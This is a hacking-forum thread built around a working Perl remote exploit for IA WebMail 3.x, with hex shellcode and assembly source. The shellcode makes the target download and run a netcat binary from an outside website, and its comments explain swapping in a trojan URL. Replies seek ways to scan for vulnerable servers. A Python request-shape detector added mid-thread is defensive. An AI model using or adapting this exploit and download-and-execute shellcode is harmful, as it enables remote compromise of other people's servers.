Toilal
Tested and works perfectly !

CODE
#!/usr/bin/perl -w
#
# IA WebMail 3.x (iaregdll.dll version 1.0.0.5) Remote Exploit
#
# By Peter Winter-Smith peter4020 hotmail.com
# Shellcode included - will need reassembling to use different
# urls and files etc.
#
# Tested against:
#  - Windows XP Home SP1
#  - Windows 2000 Pro SP4
#
# Shellcode should work each time, since it steals its addresses
# from the iaregdll.dll module import tables.
# Uses a very static jmp esp in iaregdll.dll - Should work on all
# servers without alteration!
#
# If the remote server is running a firewall, the urldownloader
# will be unable to spawn a shell, so for testing I recommend
# that you close the firewalls, or get another shellcode which
# will deal with this. This exploit is for PoC purposes only :o)
#
# Notes:
#  - WebMailsvr.exe exits without consuming 100% resources in most
#    cases.
#  - This has only been tested with IA WebMail 3.1, however it was
#    designed to exploit all versions.



use IO::Socket;

if(!($ARGV[1]))
{
print "Usage: iawebmail.pl <victim> <port>\n\n";
exit;
}

$shellcode =            "\x90\xEB\x3C\x5F\x55\x89\xE5\x81" .
                       "\xC4\xE8\xFF\xFF\xFF\x57\x31\xDB" .
                       "\xB3\x07\xB0\xFF\xFC\xF2\xAE\xFE" .
                       "\x47\xFF\xFE\xCB\x80\xFB\x01\x75" .
                       "\xF4\x5F\x57\x8D\x7F\x0B\x57\x8D" .
                       "\x7F\x13\x57\x8D\x7F\x08\x57\x8D" .
                       "\x7F\x23\x57\x8D\x7F\x09\x47\x57" .
                       "\x8D\x54\x24\x14\x52\xEB\x02\xEB" .
                       "\x52\x89\xD6\xFF\x36\xFF\x15\xDC" .
                       "\x51\x02\x10\x5A\x52\x8D\x72\xFC" .
                       "\xFF\x36\x50\xFF\x15\x14\x52\x02" .
                       "\x10\x5A\x52\x31\xC9\x51\x51\x8D" .
                       "\x72\xF0\xFF\x36\x8D\x72\xF4\xFF" .
                       "\x36\x51\xFF\xD0\x5A\x52\xFF\x72" .
                       "\xEC\xFF\x15\xDC\x51\x02\x10\x5A" .
                       "\x52\x8D\x72\xF8\xFF\x36\x50\xFF" .
                       "\x15\x14\x52\x02\x10\x5A\x52\x31" .
                       "\xC9\x41\x51\x8D\x72\xF0\xFF\x36" .
                       "\xFF\xD0\xCC\xE8\x6B\xFF\xFF\xFF" .
                       "\x55\x52\x4C\x4D\x4F\x4E\x2E\x44" .
                       "\x4C\x4C\xFF\x55\x52\x4C\x44\x6F" .
                       "\x77\x6E\x6C\x6F\x61\x64\x54\x6F" .
                       "\x46\x69\x6C\x65\x41\xFF\x57\x69" .
                       "\x6E\x45\x78\x65\x63\xFF\x68\x74" .
                       "\x74\x70\x3A\x2F\x2F\x77\x77\x77" .
                       "\x2E\x65\x6C\x69\x74\x65\x68\x61" .
                       "\x76\x65\x6E\x2E\x6E\x65\x74\x2F" .
                       "\x6E\x63\x61\x74\x2E\x65\x78\x65" .
                       "\xFF\x63\x3A\x5C\x6E\x63\x2E\x65" .
                       "\x78\x65\xFF\x6B\x65\x72\x6E\x65" .
                       "\x6C\x33\x32\x2E\x64\x6C\x6C\xFF";

$victim = IO::Socket::INET->new(Proto=>'tcp',
                               PeerAddr=>$ARGV[0],
                               PeerPort=>$ARGV[1])
                           or die "Unable to connect to $ARGV[0] on port $ARGV[1]";
$ebp = "BBBB";
$eip = "\x33\xBD\x02\x10";
$exploit = "GET /" . "a"x1036 . $ebp . $eip . $shellcode . " HTTP/1.1\n\n";

print $victim $exploit;

print " + Malicious GET request sent ...\n";
print " + Wait a moment now, then connect to $ARGV[0] on port 9999.\n";
print "Done.\n";

close($victim);
exit;

#####################################################################
##                            SHELLCODE                             #
#####################################################################
#; IA WebMail 3.x Shellcode (iaregdll.dll version 1.0.0.5)
#; Url Download + Execute
#; By Peter Winter-Smith
#; [peter4020@hotmail.com]
#;
#; nasmw -fbin -o iashellcode.s iashellcode.asm
#
# bits 32
#
# int3
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [100251DCh]; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [10025214h]; GetProcAddress(URLMON.DLL, URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16]; file path
# push dword [esi]
# lea esi, [edx-12]; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [100251DCh]; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi]; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [10025214h]; GetProcAddress(kernel32.dll, WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16]; file path
# push dword [esi]
#
# call eax
#
# int3
#
#
# data:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
#; When altering, you MUST be sure
#; to also alter the offsets in the 0ffh to null
#; byte search!
#; for example:
#;   db 'http://www.site.com/someguy/trojan.exe',0ffh
#; count the length of the url, and add one for the 0ffh byte.
#; The above url is 38 bytes long, plus one for our null, is 39 bytes.
#; find the code saying (at the start of the shellcode):
#;   push edi ; 'http://www.elitehaven.net/ncat.exe'
#;   lea edi, [edi+35]
#; and make it:
#;   push edi ; 'http://www.site.com/someguy/trojan.exe'
#;   lea edi, [edi+39]
#; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#####################################################################
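The request the script above sends is "GET /" followed by 1036 bytes of padding, the saved EBP and EIP overwrite, and the shellcode, all packed into the request-target. Nothing like that appears in a legitimate WebMail URL, so the shape itself is easy to flag at a reverse proxy or in request logs. The following Python check is an added example, not part of Toilal's post or of the original exploit; the thresholds (1024-byte target limit, 256-byte repeat run) and the sample requests are constructed assumptions rather than values taken from the page.

```python
"""Flag HTTP request lines shaped like the IA WebMail overflow request.

Added example (not part of the original post or of the exploit it quotes).
The exploit request is "GET /" + 1036 bytes of padding + 4 bytes of saved
EBP + 4 bytes of EIP + shellcode, all inside the request-target. A logger
or reverse proxy can flag that on three cheap signals: target length,
non-printable bytes, and a long run of one repeated byte. Thresholds and
sample requests below are constructed assumptions, not values from the page.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

# Assumed thresholds: a real WebMail path is far shorter than the 1036-byte
# padding, and normal URLs never contain hundreds of copies of one byte.
MAX_TARGET_LEN = 1024
MAX_REPEAT_RUN = 256

# Matches MAX_REPEAT_RUN or more copies of the same byte (the "a" x 1036 pad).
_REPEAT_RUN = re.compile(rb"(.)\1{%d,}" % (MAX_REPEAT_RUN - 1), re.DOTALL)


@dataclass
class Finding:
    method: bytes
    target_len: int
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return bool(self.reasons)


def parse_request_line(raw: bytes) -> Optional[Tuple[bytes, bytes, bytes]]:
    """Split the first line into (method, target, version).

    Shellcode may contain 0x20 or 0x09, so the target is taken as everything
    between the first space and the *last* " HTTP/" rather than split on
    whitespace; that keeps the whole payload inside the target field.
    """
    line = raw.split(b"\n", 1)[0].rstrip(b"\r")
    sp = line.find(b" ")
    ver = line.rfind(b" HTTP/")
    if sp < 0 or ver <= sp:
        return None
    return line[:sp], line[sp + 1:ver], line[ver + 1:]


def inspect_request(raw: bytes) -> Finding:
    """Return a Finding whose reasons list is empty for an ordinary request."""
    parsed = parse_request_line(raw)
    if parsed is None:
        return Finding(method=b"?", target_len=0, reasons=["unparseable request line"])
    method, target, _version = parsed
    finding = Finding(method=method, target_len=len(target))

    if len(target) > MAX_TARGET_LEN:
        finding.reasons.append(
            f"request-target is {len(target)} bytes (limit {MAX_TARGET_LEN})")

    # Raw machine code in the URL shows up as bytes outside printable ASCII.
    binary = sum(1 for b in target if b < 0x21 or b > 0x7E)
    if binary:
        finding.reasons.append(f"{binary} non-printable bytes in request-target")

    run = _REPEAT_RUN.search(target)
    if run:
        finding.reasons.append(
            f"run of {len(run.group(0))} repeated {run.group(1)!r} bytes (padding)")
    return finding


# Constructed samples. The second one copies only the *shape* of the exploit
# request: padding, two 4-byte placeholders, and a few high bytes standing in
# for shellcode; the placeholder values are not those from the exploit.
BENIGN_REQUEST = b"GET /cgi-bin/webmail.exe?action=login HTTP/1.1\r\nHost: mail\r\n\r\n"
EXPLOIT_SHAPED_REQUEST = (
    b"GET /" + b"a" * 1036 + b"BBBB" + b"\xde\xad\xbe\xef"
    + b"\x90\x90\xcc\xeb" + b" HTTP/1.1\n\n"
)
SHORT_PADDED_REQUEST = b"GET /" + b"a" * 300 + b" HTTP/1.0\r\n\r\n"


if __name__ == "__main__":
    for name, req in [("benign", BENIGN_REQUEST),
                      ("exploit-shaped", EXPLOIT_SHAPED_REQUEST),
                      ("short-padded", SHORT_PADDED_REQUEST)]:
        f = inspect_request(req)
        verdict = "ALERT" if f.suspicious else "ok"
        print(f"{name:15} {verdict:5} target_len={f.target_len} {f.reasons}")
```

The three signals are deliberately independent: the length check alone would miss a shorter padding if someone retuned the offset, while the repeat-run and non-printable checks still fire. Any of them is also a sensible rule to feed a WAF or IDS as a generic long-URL overflow signature, independent of this particular product.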
elBartalo
thx 4 your work
Can anyone compile this exploit? I get many errors compiling it with lcc...
How can i scan this shit? =)
nipagini
lol he tried to compile this...
It's in perl m8!
use xray to scan for this dll.
)Oni(
hee why xray ? and hm i get some errors when i try to compile it ... someone has compiled ? pls post the File !
Grohs
yes, it's perl..

you do not have to compile it.

just make a Ia Webmail 3.x.pl file, then start it with perl


sry for my bad english

greez
axl
anyway to scan for it ??
yeyo
Thanks man, i heard something about this exploit in ZODIAC
flame
QUOTE (nipagini @ Nov 19 2003, 01:40 PM)
lol he tried to compile this...
It's in perl m8!
use xray to scan for this dll.

like this ?
/_vti_bin/_vti_aut/iareqdll.dll ?
Flinston
yeah a how to scan would be useful

thanks anyway
T3cHn0b0y
The code is saying it will download 'http://www.elitehaven.net/ncat.exe' and execute c:\nc.exe

Shouldn't the shellcode be modified for a successful demonstration of the exploit?
Gurou
QUOTE (T3cHn0b0y @ Nov 19 2003, 07:29 PM)
The code is saying it will download 'http://www.elitehaven.net/ncat.exe' and execute c:\nc.exe

Shouldn't the shellcode be modified for a successful demonstration of the exploit?

the shell code can be modified

look here : http://www.k-otik.net/exploits/11.19.iawebmail.pl.php

(at the end)
Lucaz
Well i changed the code and used my own files.. even tried some vb exploit proggie from the files section. but nothing worked...

The perl script doesn't make the server download my file and the vb thing always says ia webmail not found..(i checked 6 servers by hand and 100% there was ia webmail installed and the dll was there so i really think that proggie doesn't work)
-=[MePhIsTo]=-
QUOTE (Toilal @ Nov 19 2003, 12:30 PM)
Tested and works perfectly !

it will be nice when you give some feedback
Yosam
can anyone give me more information about this xray thingie?

i tried searching for it on google but no luck..

i'll appreciate if someone could give me a link to it (and a little explanation would be helpful as well).


thanks in advance.
mcmix
who has any scanner for this webmail..?

 
Invision Power Board © 2001-2005 Invision Power Services, Inc.